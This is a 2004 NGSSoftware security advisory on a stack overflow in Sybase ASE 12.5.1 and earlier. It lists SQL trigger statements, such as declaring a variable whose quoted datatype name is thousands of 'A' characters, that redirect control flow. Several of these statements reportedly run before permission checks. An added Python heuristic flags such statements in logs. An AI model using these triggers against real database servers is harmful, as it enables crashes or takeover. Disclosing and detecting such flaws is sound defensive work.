
ASE 12.5.1 datatype overflow

NGSSoftware Insight Security Research Advisory

 

Name: Sybase ASE convert overflow

Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower

Severity: High

Vendor URL: http://www.sybase.com

Author: Sherief Hammad [ sherief@ngssoftware.com ]

Date of Technical Advisory: 25th June 2004

 

Details


 

There is an exploitable stack overflow in Sybase's handling of bespoke datatypes. Any SQL statement that defines a datatype as part of its syntax is vulnerable to this overflow. Access to these functions cannot be prohibited.

 

The bug can be observed by starting the Sybase server, attaching a debugger and then running the SQL statement:

 

declare @foo ‘AAAA…..AAAA’

 

9600 A’s are sufficient to direct the flow of control to the address 0x41414141 (‘AAAA’ in hex) on a Windows XP platform.

 

Other attack vectors to the same code are:

 

declare var1 ‘lotsofAs’

 

create table #foo (col1 ‘lotsofAs’)

 

alter table master.dbo.sysobjects add col1 ‘lotsofAs’

NB. breaks before checking perms

This obviously works with modify and add

 

 

create function foo ( var1 ‘lotsofAs’) returns int language java parameter style java external name ‘java.test’

create function foo ( var1 int) returns ‘lotsofAs’ language java parameter style java external name ‘java.test’

NB. breaks before checking perms

 

create procedure foo @var1 ‘lotsofAs’ as return 0

NB. breaks before checking perms
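
A defensive check for the statement forms listed above, as an added example that is not part of the original advisory: it flags quoted datatype names longer than a limit in SQL statements taken from an audit log or a database proxy. The 30-character limit and the function name `oversized_type_names` are assumptions, not values from the advisory.

```python
import re

# Assumption (not from the advisory): type names on ASE 12.5-era servers are
# ordinary identifiers of at most 30 characters; tune for your environment.
MAX_TYPE_NAME = 30

QUOTE = "'\"\u2018\u2019"  # straight and typographic quotes
# A quoted token; the closing quote is optional so truncated log lines still count.
QUOTED = re.compile(rf"[{QUOTE}]([^{QUOTE}]*)(?:[{QUOTE}]|$)")
# Statement forms listed in the advisory.
FORMS = re.compile(
    r"^\s*(declare|create\s+table|alter\s+table|create\s+function|"
    r"create\s+proc(?:edure)?)\b", re.I)
# After masking, a datatype position is: identifier (or RETURNS), space, '<length>'.
TYPE_POS = re.compile(r"@?[\w#.]+\s+'(\d+)'")
# Text after these keywords is a body or external name, not a datatype.
HEADER_END = re.compile(r"\b(?:as|language)\b", re.I)


def oversized_type_names(statement, limit=MAX_TYPE_NAME):
    """Return (form, length) for each quoted type name longer than `limit`."""
    form = FORMS.match(statement)
    if not form:
        return []
    # Replace every quoted token with its length so the later regexes never
    # scan kilobytes of filler and keywords inside quotes are ignored.
    masked = QUOTED.sub(lambda m: f"'{len(m.group(1))}'", statement)
    name = " ".join(form.group(1).lower().split())
    if name.startswith(("create function", "create proc")):
        # Keep only the parameter list and RETURNS clause.
        masked = HEADER_END.split(masked, maxsplit=1)[0]
    return [(name, int(n)) for n in TYPE_POS.findall(masked) if int(n) > limit]
```

This is a heuristic: it only covers quoted type names in the listed statement forms, and a `declare` batch that also selects a long string literal can produce a false positive.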

 

 

Fix Information


 

The vendor has not yet confirmed the existence of the bug.

 

About NGSSoftware


 

NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware’s sister company, NGSConsulting, offers best-of-breed security consulting services, specializing in application, host and network security assessments.

 

http://www.ngssoftware.com/

 

Telephone +44 208 401 0070

Fax +44 208 401 0076

 

enquiries@ngssoftware.com